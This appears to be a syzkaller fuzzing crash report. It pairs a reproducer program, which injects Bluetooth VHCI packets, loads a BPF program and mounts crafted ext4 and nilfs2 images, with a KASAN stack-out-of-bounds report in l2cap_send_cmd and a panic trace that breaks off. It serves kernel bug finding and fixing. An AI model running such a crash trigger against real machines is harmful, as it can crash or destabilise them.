program:
syz_emit_vhci(&(0x7f0000000200)=ANY=[@ANYBLOB="02c92020001c000500170518000300f9ff04007f0001040e00090004000300070006000400"], 0x25)
close_range(0xffffffffffffffff, 0xffffffffffffffff, 0x2)
mkdirat(0xffffffffffffff9c, &(0x7f0000000000)='./file0\x00', 0x0)
keyctl$clear(0x5, 0xffffffffffffffff)
request_key(&(0x7f0000000000)='logon\x00', &(0x7f0000000080)={'syz', 0x0}, &(0x7f00000000c0)='@^\x00', 0x0)
mount(0x0, &(0x7f0000000080)='./file0\x00', &(0x7f0000000040)='cgroup2\x00', 0x0, 0x0)
r0 = openat$cgroup_root(0xffffffffffffff9c, &(0x7f0000000000), 0x200002, 0x0)
r1 = bpf$PROG_LOAD(0x5, &(0x7f0000000080)={0x9, 0x4, &(0x7f0000000400)=ANY=[@ANYBLOB="180000000000000000000000000000006112000000000000950000000000000051fa7824c74186dcbeec0696c37b64e3b24da3183dbe97e805165c0f63cdc2e82818254950ee03568b88091e6a86450545c0e18e09"], &(0x7f0000000100)='GPL\x00', 0x0, 0x0, 0x0, 0x0, 0x0, '\x00', 0x0, @cgroup_sock}, 0x70)
request_key(&(0x7f0000000280)='cifs.idmap\x00', &(0x7f00000002c0)={'syz', 0x1}, &(0x7f00000003c0)='\x00', 0xfffffffffffffffd)
r2 = bpf$BPF_LINK_CREATE(0x1c, &(0x7f0000000180)={r1, r0, 0x2, 0x0, @void}, 0x10)
bpf$LINK_DETACH(0x22, &(0x7f0000000380)=r2, 0x4)
syz_mount_image$ext4(&(0x7f0000000040)='ext4\x00', &(0x7f0000000180)='./bus\x00', 0x1000e, &(0x7f0000000300), 0x3, 0x445, &(0x7f0000000b00)="$eJzs28+PE1UcAPDvTLeLCLgr4g9+qKto3PhjlwVUDh7UaOIBExM96HGzuxCksIZdEyFEwRg8GWPi3Xj0X/CkF2M8mXjVuyEhhgvgqWbaGbYtbdktLUX6+SQD78282fe+nXnte/PaAEbWVPZPErE1Iv6MiIl6trnAVP2/q5fPLly7fHYhiWr13X+SWrkrl88uFEWL87bkmek0Iv0iid1t6l05feb4fKWydCrPz66e+Gh25fSZF46dmD+6dHTp5P5Dhw4emHv5pf0v9iXOrE1Xdn26vGfnWx988/bhr5rib4mjT6a6HXy6Wu1zdcO1rSGdjA2xIWxIKSKyy1Wu9f+JKMXaxZuINz8fauOAgapWq9UtnQ+fqwJ3sSSa87o8jIrigz6b/xZb6yDg1cENP4bu0mv1CVAW99V8qx8ZizQvU26Z3/bTVES8f+7f77ItBvMcAgCgyU/Z+Of5duO/NB5qKHdfvjY0GRH3R8T2iHggInZExIMRtbIPR8QjG6y/dZHkxvFPerGnwNYpG/+9kq9tNY//itFfTJby3LZa/OXkyLHK0r78NZmO8qYsP9eljp/f+OPrTscax3/ZltVfjAXzdlwc29R8zuL86vytxNzo0vmIXWPt4k+urwQkEbEzInb1WMexZ3/Y0+nYzePvog/rTNXvI56pX/9z0RJ/Iem+Pjl7T1SW9s0Wd8WNfvv9wjud6r+l+Psgu/73tr3/r8c/mTSu165svI4Lf33ZcU7T6/0/nrxXS4/n+z6ZX109NRcxnhyuN7px//61c4t8UT6Lf3pv+/6/PdZeid0Rkd3Ej0bEYxHxeN72JyLiyYjY2yX+X19/6sPe4x+sLP7FDV3/tcR4tO5pnygd/+XHpkonb4j/Wvfrf7CWms73rOf9bz3t6u1uBgAAgP+fNCK2RpLOXE+n6cxM/fvyOyLSyvLK6nNHlj8+uVj/jcBklNPiSddEw/PQuXxaX8+fj4j6VwuK4wfy58bfljbX8jMLy5XFYQcPI25Lh/6f+bs07NYBA+f3WjC69H8YXfo/jC79H0ZXm/6/eRjtAG6/dp//nw2hHcDt19L/LfvBCDH/h9Gl/8Po0v9hJK1sjpv/SL5rovhLPZ5+1yaifEc0Y2CJSO+IZkgMKDHc9yUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIB++S8AAP///fHg0g==")
r3 = openat$cgroup_ro(0xffffffffffffff9c, &(0x7f0000000140)='blkio.bfq.io_service_bytes\x00', 0x275a, 0x0)
ioctl$FIBMAP(r3, 0x1, &(0x7f0000000080)=0x3f015764)
syz_mount_image$nilfs2(&(0x7f0000000dc0), &(0x7f0000000400)='./file0\x00', 0x90, &(0x7f0000003280)=ANY=[@ANYBLOB="0001def4774774366f0b8a20db13db64e85fc9322c3fe018b91ff1291b4f4c56de7e4543f49818e1307d98d09daa1e2a7dbf88003e9401dc73aad0b7dbb5685565c7825ba8340621faeae92abed19c524ab06c4303258d253722e159642af447aeb096c6a26d345d82f2925163331b0e9157441a9c61dd1051d3b970f9ac12f5975cf1ad4e45acef1a54921c492a77bcb1858b68758ed339608b8e43c733219f1f9e0b867840f821e03bc0e8a497c4d5dde436000090a397637dedb2f3"], 0x1, 0xd99, &(0x7f0000006900)="$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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI3G2uPi4nSV0tu33rr4n6kf/Hh1ykwrx+za43geW0opNVNKVR4fD8u7PrGefvbJtUud0ipdWHss4+nZu615j6zOn2bT7TSZnvv45M2XPnhm+b0TN05cfGPuzs60HgAAAEbDFwEAAP//ManlwQ==")
r4 = openat(0xffffffffffffff9c, &(0x7f0000000240)='.\x00', 0x0, 0x0)
ioctl$NILFS_IOCTL_CLEAN_SEGMENTS(r4, 0x40786e88, &(0x7f0000000640)={{0x0, 0x0, 0x40, 0xd, 0xe2}, {0x0, 0x0, 0x10, 0x20c, 0xfffffffffffffff8}, {&(0x7f0000000340)=[0x6, 0x20], 0x2, 0x8, 0x1, 0x2}, {0x0, 0x0, 0x28, 0x0, 0xffffffffffffff2d}, {&(0x7f00000001c0)=[0x9, 0xffffffffffffff92], 0x2, 0x8, 0x98f, 0xffff}})

[  104.073059][ T5302] Bluetooth: hci0: command tx timeout
[  104.167081][ T5302] ==================================================================
[  104.171940][ T5302] BUG: KASAN: stack-out-of-bounds in l2cap_send_cmd+0x2a3/0xb90
[  104.175473][ T5302] Read of size 24 at addr ffffc9000326f500 by task kworker/u5:2/5302
[  104.179262][ T5302] 
[  104.180347][ T5302] CPU: 0 UID: 0 PID: 5302 Comm: kworker/u5:2 Not tainted syzkaller #0 PREEMPT(full) 
[  104.180365][ T5302] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[  104.180376][ T5302] Workqueue: hci0 hci_rx_work
[  104.180403][ T5302] Call Trace:
[  104.180413][ T5302]  <TASK>
[  104.180420][ T5302]  dump_stack_lvl+0xe8/0x150
[  104.180440][ T5302]  print_report+0xba/0x230
[  104.180455][ T5302]  ? l2cap_send_cmd+0x2a3/0xb90
[  104.180468][ T5302]  kasan_report+0x117/0x150
[  104.180481][ T5302]  ? trace_kmem_cache_alloc+0x29/0xf0
[  104.180499][ T5302]  ? l2cap_send_cmd+0x2a3/0xb90
[  104.180512][ T5302]  kasan_check_range+0x264/0x2c0
[  104.180524][ T5302]  ? l2cap_send_cmd+0x2a3/0xb90
[  104.180535][ T5302]  __asan_memcpy+0x29/0x70
[  104.180548][ T5302]  l2cap_send_cmd+0x2a3/0xb90
[  104.180562][ T5302]  l2cap_recv_frame+0xc032/0x10240
[  104.180575][ T5302]  ? lock_release+0x4b/0x3d0
[  104.180587][ T5302]  ? ret_from_fork_asm+0x1a/0x30
[  104.180602][ T5302]  ? unwind_next_frame+0xa5/0x23c0
[  104.180618][ T5302]  ? rcu_is_watching+0x15/0xb0
[  104.180633][ T5302]  ? lock_release+0x4b/0x3d0
[  104.180645][ T5302]  ? unwind_next_frame+0x1aaf/0x23c0
[  104.180672][ T5302]  ? unwind_next_frame+0xa5/0x23c0
[  104.180690][ T5302]  ? unwind_next_frame+0x1aaf/0x23c0
[  104.180711][ T5302]  ? __pfx_l2cap_recv_frame+0x10/0x10
[  104.180727][ T5302]  ? ret_from_fork_asm+0x1a/0x30
[  104.180747][ T5302]  ? ret_from_fork_asm+0x1a/0x30
[  104.180764][ T5302]  ? __pfx_stack_trace_consume_entry+0x10/0x10
[  104.180779][ T5302]  ? ret_from_fork_asm+0x1a/0x30
[  104.180797][ T5302]  ? stack_trace_save+0xa9/0x100
[  104.180807][ T5302]  ? __pfx_stack_trace_save+0x10/0x10
[  104.180819][ T5302]  ? check_path+0x21/0x40
[  104.180834][ T5302]  ? check_noncircular+0xda/0x150
[  104.180851][ T5302]  ? add_lock_to_list+0xc7/0x100
[  104.180867][ T5302]  ? lockdep_unlock+0x5d/0xd0
[  104.180879][ T5302]  ? __lock_acquire+0x146e/0x2cf0
[  104.180898][ T5302]  ? __mutex_trylock_common+0x158/0x260
[  104.180914][ T5302]  ? __pfx___mutex_trylock_common+0x10/0x10
[  104.180930][ T5302]  ? rcu_is_watching+0x15/0xb0
[  104.180945][ T5302]  ? trace_contention_end+0x3d/0x150
[  104.180962][ T5302]  ? __mutex_lock+0x319/0x1300
[  104.180976][ T5302]  ? l2cap_recv_acldata+0x2e3/0x13e0
[  104.180990][ T5302]  ? l2cap_recv_acldata+0x30b/0x13e0
[  104.181004][ T5302]  ? __mutex_unlock_slowpath+0x1bd/0x7d0
[  104.181016][ T5302]  ? __pfx___mutex_lock+0x10/0x10
[  104.181028][ T5302]  ? __pfx___mutex_unlock_slowpath+0x10/0x10
[  104.181039][ T5302]  ? l2cap_conn_hold_unless_zero+0x179/0x2b0
[  104.181054][ T5302]  ? __pfx_l2cap_conn_hold_unless_zero+0x10/0x10
[  104.181069][ T5302]  ? l2cap_recv_acldata+0x41/0x13e0
[  104.181084][ T5302]  l2cap_recv_acldata+0x7e9/0x13e0
[  104.181099][ T5302]  hci_rx_work+0x4f9/0x1030
[  104.181113][ T5302]  ? process_scheduled_works+0xa25/0x1830
[  104.181128][ T5302]  process_scheduled_works+0xb02/0x1830
[  104.181149][ T5302]  ? __pfx_process_scheduled_works+0x10/0x10
[  104.181167][ T5302]  ? assign_work+0x3d5/0x5e0
[  104.181182][ T5302]  worker_thread+0xa50/0xfc0
[  104.181203][ T5302]  kthread+0x388/0x470
[  104.181215][ T5302]  ? __pfx_worker_thread+0x10/0x10
[  104.181228][ T5302]  ? __pfx_kthread+0x10/0x10
[  104.181239][ T5302]  ret_from_fork+0x51e/0xb90
[  104.181263][ T5302]  ? __pfx_ret_from_fork+0x10/0x10
[  104.181280][ T5302]  ? __switch_to+0xc7d/0x1450
[  104.181297][ T5302]  ? __pfx_kthread+0x10/0x10
[  104.181307][ T5302]  ret_from_fork_asm+0x1a/0x30
[  104.181327][ T5302]  </TASK>
[  104.181332][ T5302] 
[  104.344020][ T5302] The buggy address belongs to stack of task kworker/u5:2/5302
[  104.347366][ T5302]  and is located at offset 128 in frame:
[  104.349911][ T5302]  l2cap_recv_frame+0x0/0x10240
[  104.352347][ T5302] 
[  104.353565][ T5302] This frame has 26 objects:
[  104.355836][ T5302]  [32, 34) 'rsp.i241.i.i'
[  104.355872][ T5302]  [48, 88) 'chan.i.i.i'
[  104.357933][ T5302]  [128, 146) 'pdu_u.i.i.i'
[  104.360041][ T5302]  [192, 202) 'rsp.i94.i.i'
[  104.362140][ T5302]  [224, 226) 'rsp.i.i.i111'
[  104.364220][ T5302]  [240, 242) 'rej.i'
[  104.366391][ T5302]  [256, 258) 'rej.i145.i'
[  104.368383][ T5302]  [272, 274) 'rej.i143.i'
[  104.370662][ T5302]  [288, 290) 'req.i229.i.i'
[  104.372859][ T5302]  [304, 312) 'buf.i222.i.i'
[  104.375001][ T5302]  [336, 348) 'buf29.i.i.i'
[  104.377390][ T5302]  [368, 372) 'rsp49.i.i.i'
[  104.379563][ T5302]  [384, 393) 'rfc.i.i118.i.i'
[  104.381699][ T5302]  [416, 480) 'buf.i119.i.i'
[  104.383953][ T5302]  [512, 576) 'req.i120.i.i'
[  104.386102][ T5302]  [608, 617) 'rfc.i.i.i.i'
[  104.388248][ T5302]  [640, 656) 'efs.i.i.i.i'
[  104.390651][ T5302]  [672, 678) 'rej.i371.i.i.i'
[  104.393014][ T5302]  [704, 710) 'rej.i.i.i.i'
[  104.395585][ T5302]  [736, 800) 'rsp.i.i.i'
[  104.397870][ T5302]  [832, 896) 'buf.i.i.i'
[  104.399877][ T5302]  [928, 1056) 'req.i.i.i'
[  104.401787][ T5302]  [1088, 1096) 'rsp.i.i.i.i'
[  104.403925][ T5302]  [1120, 1122) 'info.i.i.i.i'
[  104.406152][ T5302]  [1136, 1264) 'buf.i.i.i.i'
[  104.408576][ T5302]  [1296, 1298) 'rej.i.i'
[  104.410965][ T5302] 
[  104.414357][ T5302] The buggy address belongs to a 8-page vmalloc region starting at 0xffffc90003268000 allocated at copy_process+0x508/0x3cf0
[  104.420213][ T5302] The buggy address belongs to the physical page:
[  104.422999][ T5302] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x41d07
[  104.427833][ T5302] flags: 0x4fff00000000000(node=1|zone=1|lastcpupid=0x7ff)
[  104.431759][ T5302] raw: 04fff00000000000 0000000000000000 dead000000000122 0000000000000000
[  104.435537][ T5302] raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000
[  104.439252][ T5302] page dumped because: kasan: bad access detected
[  104.441999][ T5302] page_owner tracks the page as allocated
[  104.444549][ T5302] page last allocated via order 0, migratetype Unmovable, gfp_mask 0x29c2(GFP_NOWAIT|__GFP_HIGHMEM|__GFP_IO|__GFP_FS|__GFP_ZERO), pid 2, tgid 2 (kthreadd), ts 99733886825, free_ts 98009719148
[  104.454525][ T5302]  post_alloc_hook+0x231/0x280
[  104.456774][ T5302]  get_page_from_freelist+0x24dc/0x2580
[  104.459181][ T5302]  __alloc_frozen_pages_noprof+0x18d/0x380
[  104.461826][ T5302]  __alloc_pages_noprof+0xa/0x30
[  104.464062][ T5302]  __vmalloc_node_range_noprof+0x7be/0x1730
[  104.466686][ T5302]  __vmalloc_node_noprof+0xc2/0x100
[  104.469414][ T5302]  dup_task_struct+0x228/0x9a0
[  104.471941][ T5302]  copy_process+0x508/0x3cf0
[  104.474432][ T5302]  kernel_clone+0x248/0x8e0
[  104.476721][ T5302]  kernel_thread+0x13f/0x1b0
[  104.478721][ T5302]  kthreadd+0x4ec/0x6e0
[  104.480585][ T5302]  ret_from_fork+0x51e/0xb90
[  104.482612][ T5302]  ret_from_fork_asm+0x1a/0x30
[  104.485181][ T5302] page last free pid 5297 tgid 5297 stack trace:
[  104.488770][ T5302]  __free_frozen_pages+0xc2b/0xdb0
[  104.491453][ T5302]  __slab_free+0x263/0x2b0
[  104.493438][ T5302]  qlist_free_all+0x97/0x100
[  104.495487][ T5302]  kasan_quarantine_reduce+0x148/0x160
[  104.497835][ T5302]  __kasan_slab_alloc+0x22/0x80
[  104.500160][ T5302]  __kmalloc_noprof+0x316/0x760
[  104.502610][ T5302]  tomoyo_supervisor+0xc22/0x1570
[  104.505395][ T5302]  tomoyo_path_permission+0x25a/0x380
[  104.508266][ T5302]  tomoyo_path_perm+0x3f3/0x560
[  104.510589][ T5302]  security_inode_getattr+0x12b/0x310
[  104.513002][ T5302]  __x64_sys_newfstat+0x13b/0x270
[  104.515468][ T5302]  do_syscall_64+0x14d/0xf80
[  104.517712][ T5302]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[  104.520777][ T5302] 
[  104.522180][ T5302] Memory state around the buggy address:
[  104.525176][ T5302]  ffffc9000326f400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  104.528976][ T5302]  ffffc9000326f480: f1 f1 f1 f1 f8 f2 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2
[  104.532565][ T5302] >ffffc9000326f500: 00 00 02 f2 f2 f2 f2 f2 f8 f8 f2 f2 f8 f2 f8 f2
[  104.536070][ T5302]                          ^
[  104.538223][ T5302]  ffffc9000326f580: f8 f2 f8 f2 f8 f2 f8 f2 f2 f2 f8 f8 f2 f2 f8 f2
[  104.542358][ T5302]  ffffc9000326f600: f8 f8 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
[  104.546497][ T5302] ==================================================================
[  104.556831][ T5302] Kernel panic - not syncing: KASAN: panic_on_warn set ...
[  104.560500][ T5302] CPU: 0 UID: 0 PID: 5302 Comm: kworker/u5:2 Not tainted syzkaller #0 PREEMPT(full) 
[  104.565332][ T5302] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[  104.570115][ T5302] Workqueue: hci0 hci_rx_work
[  104.572252][ T5302] Call Trace:
[  104.573856][ T5302]  <TASK>
[  104.575509][ T5302]  vpanic+0x56c/0xa60
[  104.577624][ T5302]  ? __pfx_vpanic+0x10/0x10
[  104.580206][ T5302]  panic+0xc5/0xd0
[  104.582183][ T5302]  ? __pfx_panic+0x10/0x10
[  104.584213][ T5302]  ? preempt_schedule_thunk+0x16/0x30
[  104.586557][ T5302]  ? preempt_schedule_thunk+0x16/0x30
[  104.589030][ T5302]  ? l2cap_send_cmd+0x2a3/0xb90
[  104.591278][ T5302]  check_panic_on_warn+0x89/0xb0
[  104.593433][ T5302]  ? l2cap_send_cmd+0x2a3/0xb90
[  104.595654][ T5302]  end_report+0x73/0x180
[  104.597756][ T5302]  ? l2cap_send_cmd+0x2a3/0xb90
[  104.600521][ T5302]  kasan_report+0x128/0x150
[  104.603305][ T5302]  ? trace_kmem_cache_alloc+0x29/0xf0
[  104.606098][ T5302]  ? l2cap_send_cmd+0x2a3/0xb90
[  104.608298][ T5302]  kasan_check_range+0x264/0x2c0
[  104.610494][ T5302]  ? l2cap_send_cmd+0x2a3/0xb90
[  104.612652][ T5302]  __asan_memcpy+0x29/0x70
[  104.614624][ T5302]  l2cap_send_cmd+0x2a3/0xb90
[  104.616747][ T5302]  l2cap_recv_frame+0xc032/0x10240
[  104.619598][ T5302]  ? lock_release+0x4b/0x3d0
[  104.622699][ T5302]  ? ret_from_fork_asm+0x1a/0x30
[  104.625092][ T5302]  ? unwind_next_frame+0xa5/0x23c0
[  104.627492][ T5302]  ? rcu_is_watching+0x15/0xb0
[  104.629526][ T5302]  ? lock_release+0x4b/0x3d0
[  104.631487][ T5302]  ? unwind_next_frame+0x1aaf/0x23c0
[  104.633792][ T5302]  ? unwind_next_frame+0xa5/0x23c0
[  104.636219][ T5302]  ? unwind_next_frame+0x1aaf/0x23c0
[  104.639078][ T5302]  ? __pfx_l2cap_recv_frame+0x10/0x10
[  104.641769][ T5302]  ? ret_from_fork_asm+0x1a/0x30
[  104.644066][ T5302]  ? ret_from_fork_asm+0x1a/0x30
[  104.646257][ T5302]  ? __pfx_stack_trace_consume_entry+0x10/0x10
[  104.648991][ T5302]  ? ret_from_fork_asm+0x1a/0x30
[  104.651321][ T5302]  ? stack_trace_save+0xa9/0x100
[  104.653762][ T5302]  ? __pfx_stack_trace_save+0x10/0x10
[  104.656473][ T5302]  ? check_path+0x21/0x40
[  104.658476][ T5302]  ? check_noncircular+0xda/0x150
[  104.660630][ T5302]  ? add_lock_to_list+0xc7/0x100
[  104.662744][ T5302]  ? lockdep_unlock+0x5d/0xd0
[  104.664795][ T5302]  ? __lock_acquire+0x146e/0x2cf0
[  104.667343][ T5302]  ? __mutex_trylock_common+0x158/0x260
[  104.670978][ T5302]  ? __pfx___mutex_trylock_common+0x10/0x10
[  104.674387][ T5302]  ? rcu_is_watching+0x15/0xb0
[  104.676550][ T5302]  ? trace_contention_end+0x3d/0x150
[  104.678867][ T5302]  ? __mutex_lock+0x319/0x1300
[  104.681020][ T5302]  ? l2cap_recv_acldata+0x2e3/0x13e0
[  104.683407][ T5302]  ? l2cap_recv_acldata+0x30b/0x13e0
[  104.685742][ T5302]  ? __mutex_unlock_slowpath+0x1bd/0x7d0
[  104.688464][ T5302]  ? __pfx___mutex_lock+0x10/0x10
[  104.690864][ T5302]  ? __pfx___mutex_unlock_slowpath+0x10/0x10
[  104.694195][ T5302]  ? l2cap_conn_hold_unless_zero+0x179/0x2b0
[  104.696876][ T5302]  ? __pfx_l2cap_conn_hold_unless_zero+0x10/0x10
[  104.699616][ T5302]  ? l2cap_recv_acldata+0x41/0x13e0
[  104.701993][ T5302]  l2cap_recv_acldata+0x7e9/0x13e0
[  104.704389][ T5302]  hci_rx_work+0x4f9/0x1030
[  104.706623][ T5302]  ? process_scheduled_works+0xa25/0x1830
[  104.709531][ T5302]  process_scheduled_works+0xb02/0x1830
[  104.712151][ T5302]  ? __pfx_process_scheduled_works+0x10/0x10
[  104.714872][ T5302]  ? assign_work+0x3d5/0x5e0
[  104.716933][ T5302]  worker_thread+0xa50/0xfc0
[  104.718923][ T5302]  kthread+0x388/0x470
